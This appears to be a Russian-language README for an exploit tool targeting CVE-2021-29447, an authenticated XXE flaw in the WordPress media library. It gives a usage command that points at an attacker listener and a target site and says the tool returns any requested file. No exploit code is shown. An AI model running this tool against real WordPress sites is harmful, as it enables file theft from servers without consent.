
Эксплуатация инъекции внешних XML-сущностей (XXE) в медиабиблиотеке WordPress для экфильтрации файлов.
Эксплойт аутентифицированной XML-инъекции внешних сущностей (XXE) в медиабиблиотеке WordPress для эксфильтрации файлов.
Исправлено в WordPress 5.7.1.
Требуются действительные учётные данные WordPress для взаимодействия с медиабиблиотекой.
python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD
Скрипт запросит путь к файлу и вернёт запрошенный файл.
Вдохновлено скриптом David Utón (M3n0sD0n4ld) ExploitDB.
Использование этого инструмента для атак на цели без предварительного взаимного согласия незаконно. Ответственность за соблюдение всех применимых местных, государственных и федеральных законов лежит на конечном пользователе. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб, причинённый этой программой. Используйте только в образовательных целях.
Этот скрипт выпущен под лицензией MIT.